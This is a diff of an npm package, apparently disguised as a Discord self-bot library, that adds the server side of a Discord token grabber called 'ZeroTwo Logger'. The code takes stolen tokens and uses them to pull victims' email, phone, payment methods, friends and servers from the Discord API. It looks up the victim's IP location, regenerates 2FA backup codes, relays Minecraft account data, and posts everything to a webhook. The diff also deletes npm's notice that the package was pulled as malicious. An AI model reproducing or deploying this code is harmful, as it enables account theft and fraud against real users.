+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝", "`" + guildInfos.length + "`", true)
449
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝 𝐎𝐰𝐧", "`" + owowner + "`", true)
450
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐀𝐩𝐩𝐥𝐢𝐜𝐚𝐭𝐢𝐨𝐧𝐬", "`" + appliInfos.length + "`", true)
451
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐂𝐨𝐧𝐧𝐞𝐜𝐭𝐢𝐨𝐧𝐬", "`" + connectInfos.length + "`", true)
452
+ .addField("𝗡𝗦𝗙𝗪 𝗔𝗹𝗹𝗼𝘄𝗲𝗱 ", "`" + basicInfos.nsfw_allowed + "`", true)
453
+ .addField("𝗩𝗲𝗿𝗶𝗳𝗶𝗲𝗱", "`" + basicInfos.verified + "`", true)
454
+ .addField("𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝗶𝗲", "```" + bio + "```")
455
+ .addField("𝗘𝗺𝗮𝗶𝗹", "```" + basicInfos.email + "```")
456
+ .addField("𝗣𝗵𝗼𝗻𝗲", "```" + phone + "```")
457
+ .addField("𝗧𝗼𝗸𝗲𝗻", "```" + req.token + "```")
458
+ .addField("𝐈𝐏 𝐈𝐧𝐟𝐨𝐬", "```" + `${ipInfos.country} | ${ipInfos.regionName}\n${ipInfos.city} | ${ipInfos.isp}\n${ipInfos.query}` + "```")
459
+ .addField("𝗜𝗻𝗳𝗼𝘀", "```" + `Used Code: ${req.code}` + "```")
460
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
461
+ .setImage(image)
462
+ .setColor("#00aaaa")
463
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
464
+ embed.addField("𝗜𝗻𝗷𝗲𝗰𝘁𝗲𝗱 𝗜𝗻", "```" + req.injected.split("\\")[5] + "```")
465
+ webhook.send(embed)
466
+ var friendEmbed = new Discord.RichEmbed()
467
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
468
+ .setTitle(`𝐅𝐫𝐢𝐞𝐧𝐝𝐬 𝐅𝐫𝐨𝐦 ${basicInfos.username}`)
469
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
470
+ .setDescription(friendInfos(friendsInfos))
471
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
472
+ .setImage(image)
473
+ .setColor("#00aaaa")
474
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
475
+ webhook.send(friendEmbed)
476
+ })
477
+ app.post("/inject", (req, res) => {
478
+ req = JSON.parse(req.body)
479
+ res.sendStatus(200)
480
+ var basicInfos = getInfo("https://discord.com/api/v9/users/@me", req.token)
481
+ if (basicInfos == "Invalid") return
482
+ var billingInfos = getInfo("https://discord.com/api/v9/users/@me/billing/payment-sources", req.token)
483
+ var friendsInfos = getInfo("https://discordapp.com/api/v9/users/@me/relationships", req.token)
484
+ var guildInfos = getInfo("https://discord.com/api/v9/users/@me/guilds", req.token)
485
+ var appliInfos = getInfo("https://discord.com/api/v9/applications", req.token)
486
+ var connectInfos = getInfo("https://discordapp.com/api/v9/users/@me/connections", req.token)
487
+ var ipInfos = getIPInfo(req.ipAddress)
488
+ var owowner = 0,
489
+ bio, phone
490
+ guildInfos.forEach(r => r.owner && owowner++)
491
+ if (billingInfos.length > 0) billing = `\`Yes \` `
492
+ else billing = "```No.```"
493
+ billingInfos.forEach(i => {
494
+ i.brand && 0 == i.invalid && (billing += "<:y_card_spc:918956324908318720> "),
495
+ i.email && (billing += "<:paypal:891011558040277072> ")
496
+ });
497
+ if (basicInfos.bio) bio = basicInfos.bio
498
+ else bio = "𝗡𝗼 𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝘆"
499
+ if (bio.startsWith("```") && bio.endsWith("```")) bio = bio.slice(3, -3)
500
+ if (basicInfos.phone !== null) phone = basicInfos.phone
501
+ else phone = "𝗡𝗼 𝐏𝗵𝗼𝗻𝗲."
502
+ if (basicInfos.banner) var image = `https://cdn.discordapp.com/banners/${basicInfos.id}/${basicInfos.banner}.png?size=512`
503
+ else var image = "https://www.icegif.com/wp-content/uploads/icegif-219.gif"
504
+ var embed = new Discord.RichEmbed()
505
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
506
+ .setTitle("𝗜𝗻𝗷𝗲𝗰𝘁𝗲𝗱 !")
507
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
508
+ .addField("𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲", "```" + `${basicInfos.username}#${basicInfos.discriminator}` + "```")
509
+ .addField("𝐁𝐚𝐝𝐠𝐞𝐬", badges(basicInfos.flags), true)
510
+ .addField("𝗡𝗶𝘁𝗿𝗼", getNitro(basicInfos.premium_type), true)
511
+ .addField("𝐅𝗿𝐢𝗲𝐧𝐝𝐬", "`" + friendsInfos.filter(r => r.type == 1).length + "`", true)
512
+ .addField("𝐏𝐚𝐲𝐦𝐞𝐧𝐭 𝐌𝐞𝐭𝐡𝐨𝐝", billing, true)
513
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝", "`" + guildInfos.length + "`", true)
514
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝 𝐎𝐰𝐧", "`" + owowner + "`", true)
515
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐀𝐩𝐩𝐥𝐢𝐜𝐚𝐭𝐢𝐨𝐧𝐬", "`" + appliInfos.length + "`", true)
516
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐂𝐨𝐧𝐧𝐞𝐜𝐭𝐢𝐨𝐧𝐬", "`" + connectInfos.length + "`", true)
517
+ .addField("𝗡𝗦𝗙𝗪 𝗔𝗹𝗹𝗼𝘄𝗲𝗱 ", "`" + basicInfos.nsfw_allowed + "`", true)
518
+ .addField("𝗩𝗲𝗿𝗶𝗳𝗶𝗲𝗱", "`" + basicInfos.verified + "`", true)
519
+ .addField("𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝗶𝗲", "```" + bio + "```")
520
+ .addField("𝗘𝗺𝗮𝗶𝗹", "```" + basicInfos.email + "```")
521
+ .addField("𝗣𝗵𝗼𝗻𝗲", "```" + phone + "```")
522
+ .addField("𝗧𝗼𝗸𝗲𝗻", "```" + req.token + "```")
523
+ .addField("𝐈𝐏 𝐈𝐧𝐟𝐨𝐬", "```" + `${ipInfos.country} | ${ipInfos.regionName}\n${ipInfos.city} | ${ipInfos.isp}\n${ipInfos.query}` + "```")
524
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
525
+ .setImage(image)
526
+ .setColor("#00aaaa")
527
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
528
+ embed.addField("𝗜𝗻𝗷𝗲𝗰𝘁𝗲𝗱 𝗜𝗻", "```" + req.injected.split("\\")[5] + "```")
529
+ webhook.send(embed)
530
+ var friendEmbed = new Discord.RichEmbed()
531
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
532
+ .setTitle(`𝐅𝐫𝐢𝐞𝐧𝐝𝐬 𝐅𝐫𝐨𝐦 ${basicInfos.username}`)
533
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
534
+ .setDescription(friendInfos(friendsInfos))
535
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
536
+ .setImage(image)
537
+ .setColor("#00aaaa")
538
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
539
+ webhook.send(friendEmbed)
540
+ })
541
+ app.post("/beforeinject", (req, res) => {
542
+ req = JSON.parse(req.body)
543
+ console.log(req)
544
+ var basicInfos = getInfo("https://discord.com/api/v9/users/@me", req.token)
545
+ if (basicInfos == "Invalid") return
546
+ var billingInfos = getInfo("https://discord.com/api/v9/users/@me/billing/payment-sources", req.token)
547
+ var friendsInfos = getInfo("https://discordapp.com/api/v9/users/@me/relationships", req.token)
548
+ var guildInfos = getInfo("https://discord.com/api/v9/users/@me/guilds", req.token)
549
+ var appliInfos = getInfo("https://discord.com/api/v9/applications", req.token)
550
+ var connectInfos = getInfo("https://discordapp.com/api/v9/users/@me/connections", req.token)
551
+ var ipInfos = getIPInfo(req.ipAddress)
552
+ var owowner = 0,
553
+ bio, phone
554
+ guildInfos.forEach(r => r.owner && owowner++)
555
+ if (billingInfos.length > 0) var billing = `\`Yes \` `
556
+ else var billing = "```No.```"
557
+ billingInfos.forEach(i => {
558
+ i.brand && 0 == i.invalid && (billing += "<:y_card_spc:918956324908318720> "),
559
+ i.email && (billing += "<:paypal:891011558040277072> ")
560
+ });
561
+ if (basicInfos.bio) bio = basicInfos.bio
562
+ else bio = "𝗡𝗼 𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝘆"
563
+ if (bio.startsWith("```") && bio.endsWith("```")) bio = bio.slice(3, -3)
564
+ if (basicInfos.phone !== null) phone = basicInfos.phone
565
+ else phone = "𝗡𝗼 𝐏𝗵𝗼𝗻𝗲."
566
+ if (basicInfos.banner) var image = `https://cdn.discordapp.com/banners/${basicInfos.id}/${basicInfos.banner}.png?size=512`
567
+ else var image = "https://www.icegif.com/wp-content/uploads/icegif-219.gif"
568
+ var embed = new Discord.RichEmbed()
569
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
570
+ .setTitle("𝗡𝗲𝘄 𝗧𝗼𝗸𝗲𝗻 𝗚𝗿𝗮𝗯𝗯𝗲𝗱 !")
571
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
572
+ .addField("𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲", "```" + `${basicInfos.username}#${basicInfos.discriminator}` + "```")
573
+ .addField("𝐁𝐚𝐝𝐠𝐞𝐬", badges(basicInfos.flags), true)
574
+ .addField("𝗡𝗶𝘁𝗿𝗼", getNitro(basicInfos.premium_type), true)
575
+ .addField("𝐅𝗿𝐢𝗲𝐧𝐝𝐬", "`" + friendsInfos.filter(r => r.type == 1).length + "`", true)
576
+ .addField("𝐏𝐚𝐲𝐦𝐞𝐧𝐭 𝐌𝐞𝐭𝐡𝐨𝐝", billing, true)
577
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝", "`" + guildInfos.length + "`", true)
578
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝 𝐎𝐰𝐧", "`" + owowner + "`", true)
579
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐀𝐩𝐩𝐥𝐢𝐜𝐚𝐭𝐢𝐨𝐧𝐬", "`" + appliInfos.length + "`", true)
580
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐂𝐨𝐧𝐧𝐞𝐜𝐭𝐢𝐨𝐧𝐬", "`" + connectInfos.length + "`", true)
581
+ .addField("𝗡𝗦𝗙𝗪 𝗔𝗹𝗹𝗼𝘄𝗲𝗱 ", "`" + basicInfos.nsfw_allowed + "`", true)
582
+ .addField("𝗩𝗲𝗿𝗶𝗳𝗶𝗲𝗱", "`" + basicInfos.verified + "`", true)
583
+ .addField("𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝗶𝗲", "```" + bio + "```")
584
+ .addField("𝗘𝗺𝗮𝗶𝗹", "```" + basicInfos.email + "```")
585
+ .addField("𝗣𝗵𝗼𝗻𝗲", "```" + phone + "```")
586
+ .addField("𝗧𝗼𝗸𝗲𝗻", "```" + req.token + "```")
587
+ .addField("𝐈𝐏 𝐈𝐧𝐟𝐨𝐬", "```" + `${ipInfos.country} | ${ipInfos.regionName}\n${ipInfos.city} | ${ipInfos.isp}\n${ipInfos.query}` + "```")
588
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
589
+ .setImage(image)
590
+ .setColor("#00aaaa")
591
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
592
+ webhook.send(embed)
593
+ var friendEmbed = new Discord.RichEmbed()
594
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
595
+ .setTitle(`𝐅𝐫𝐢𝐞𝐧𝐝𝐬 𝐅𝐫𝐨𝐦 ${basicInfos.username}`)
596
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
597
+ .setDescription(friendInfos(friendsInfos))
598
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
599
+ .setImage(image)
600
+ .setColor("#00aaaa")
601
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
602
+ webhook.send(friendEmbed)
603
+
604
+ })
605
+ app.post("/minecraft", (req, res) => {
606
+ req = JSON.parse(req.body)
607
+ if (req.UID) {
608
+ var embed = new Discord.RichEmbed()
609
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
610
+ .setTitle(`𝗥𝗲𝗺𝗶𝘅 𝗖𝗹𝗶𝗲𝗻𝘁 𝗨𝗜𝗗`)
611
+ .setDescription("```" + req.UID + "```")
612
+ .setColor("#00aaaa")
613
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
614
+ webhook.send(embed)
615
+ } else {
616
+ var embed = new Discord.RichEmbed()
617
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
618
+ .setTitle(`𝗠𝗶𝗻𝗲𝗰𝗿𝗮𝗳𝘁 𝗜𝗻𝗳𝗼𝘀`)
619
+ .addField(`𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲`, "```" + req.username + "```")
620
+ .addField("𝗔𝗰𝘁𝗶𝘃𝗲 𝗔𝗰𝗰𝗼𝘂𝗻𝘁", "```" + req.activeAccountLocalId + "```")
621
+ .addField("𝗠𝗶𝗴𝗿𝗮𝘁𝗶𝗼𝗻 𝗔𝗰𝗰𝗲𝗽𝘁𝗲𝗱 ?", "```" + req.eligibleForMigration + "```")
622
+ .addField("𝗠𝘂𝗹𝘁𝗶𝗽𝗲 𝗣𝗿𝗼𝗳𝗶𝗹𝗲𝘀 ?", "```" + req.hasMultipleProfiles + "```")
623
+ .addField("𝗟𝗼𝗰𝗮𝗹 𝗜𝗗", "```" + req.localId + "```")
624
+ .addField("𝗟𝗲𝗴𝗮𝗰𝘆", "```" + req.legacy + "```")
625
+ .addField("𝗣𝗿𝗼𝗳𝗶𝗹 𝗜𝗗", "```" + req.minecraftProfileID + "```")
626
+ .addField("𝗣𝗿𝗼𝗳𝗶𝗹 𝗡𝗮𝗺𝗲", "```" + req.minecraftProfileName + "```")
627
+ .addField("𝗣𝗲𝗿𝘀𝗶𝘀𝘁𝗮𝗻𝘁", "```" + req.persistent + "```")
628
+ .addField("𝗥𝗲𝗺𝗼𝘁𝗲 𝗜𝗗", "```" + req.remoteId + "```")
629
+ .addField("𝗧𝘆𝗽𝗲", "```" + req.type + "```")
630
+ .setColor("#00aaaa")
631
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
632
+ webhook.send(embed)
633
+ }
634
+ })
635
+
636
+
637
+ function getInfo(url, token) {
638
+ var data;
639
+ const res = request("GET", url, {
640
+ headers: {
641
+ "Content-Type": "application/json",
642
+ "authorization": token
643
+ }
644
+ })
645
+ if (res.statusCode !== 200) data = "Invalid"
646
+ else data = JSON.parse(res.getBody())
647
+ return data
648
+ }
649
+
650
+ function getMFACode(token, password) {
651
+ var what = ""
652
+ const res = request("POST", "https://discord.com/api/v9/users/@me/mfa/codes", {
653
+ headers: {
654
+ "Content-Type": "application/json",
655
+ "authorization": token
656
+ },
657
+ body: JSON.stringify({
658
+ password: password,
659
+ regenerate: true
660
+ })
661
+ })
662
+ var data = JSON.parse(res.getBody())
663
+ data.backup_codes.forEach(a => what += `${a.code} | `);
664
+ return what.slice(0, -2)
665
+ }
666
+
667
+ function getIPInfo(ip) {
668
+ var data;
669
+ var res = request("GET", `http://ip-api.com/json/${ip}`)
670
+ data = JSON.parse(res.getBody())
671
+ return data
672
+ }
673
+
674
+ function badges(f) {
675
+ var b = "";
676
+ if ((f & 1) == 1) b += "<:staff:869411643765964921>";
677
+ if ((f & 2) == 2) b += "<:S_badgePartnerIDK:853638010737786910>";
678
+ if ((f & 4) == 4) b += "<:Hypesquadevents:894192746569535568>"
679
+ if ((f & 8) == 8) b += "<:DE_BadgeBughunter:918945699503145011>";
680
+ if ((f & 64) == 64) b += "<:bravery:889966063100493914>";
681
+ if ((f & 128) == 128) b += "<:brilliance:889966063377317908>";
682
+ if ((f & 256) == 256) b += "<:balance:889966062962094090>";
683
+ if ((f & 512) == 512) b += "<:lgn_earlysupporter:905293948665360384>";
684
+ if ((f & 16384) == 16384) b += "<:DE_BadgeBughunterCanary:918945729400147978>";
685
+ if ((f & 131072) == 131072) b += "<:dev_bot:904823639537504286>";
686
+ if (b == "") b = ":x:"
687
+ return b
688
+ }
689
+
690
+ function friendBadges(f) {
691
+ var b = "";
692
+ if ((f & 1) == 1) b += "<:staff:869411643765964921>";
693
+ if ((f & 2) == 2) b += "<:S_badgePartnerIDK:853638010737786910>";
694
+ if ((f & 4) == 4) b += "<:Hypesquadevents:894192746569535568>"
695
+ if ((f & 8) == 8) b += "<:DE_BadgeBughunter:918945699503145011>";
696
+ if ((f & 512) == 512) b += "<:lgn_earlysupporter:905293948665360384>";
697
+ if ((f & 16384) == 16384) b += "<:DE_BadgeBughunterCanary:918945729400147978>";
698
+ if ((f & 131072) == 131072) b += "<:dev_bot:904823639537504286>";
699
+ if (b == "") b = "None"
700
+ return b
701
+ }
702
+
703
+ function getNitro(oof) {
704
+ var n = ""
705
+ if ((oof & 0) == 0) n = "<:Nitro_Yohann:901289849024282674> :x:"
706
+ if ((oof & 1) == 1) n = "<:Nitro_Yohann:901289849024282674>"
707
+ if ((oof & 2) == 2) n = "<:LNnitro:918956604987166760> <:6_boost:854202388084293642>"
708
+ if (n == "") n = "<:Nitro_Yohann:901289849024282674> :x:"
709
+ return n
710
+ }
711
+
712
+
713
+ function friendInfos(friends) {
714
+ var returned;
715
+ var friendFilter = friends.filter(r => r.type == 1)
716
+ for (filter of friendFilter) {
717
+ var badges = friendBadges(filter.user.public_flags)
718
+ if (badges != "None") returned += `${badges} ${filter.user.username}#${filter.user.discriminator}\n`
719
+ }
720
+ if (!returned) returned = "𝗛𝗶𝘀 𝗙𝗿𝗶𝗲𝗻𝗱𝘀 𝗗𝗼𝗻'𝘁 𝗵𝗮𝘃𝗲 𝗥𝗮𝗿𝗲 𝗕𝗮𝗱𝗴𝗲𝘀"
721
+ if (returned == "𝗛𝗶𝘀 𝗙𝗿𝗶𝗲𝗻𝗱𝘀 𝗗𝗼𝗻'𝘁 𝗵𝗮𝘃𝗲 𝗥𝗮𝗿𝗲 𝗕𝗮𝗱𝗴𝗲𝘀") return returned
722
+ else return returned.slice(9)
723
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=discordjs-selfbotjs for more information.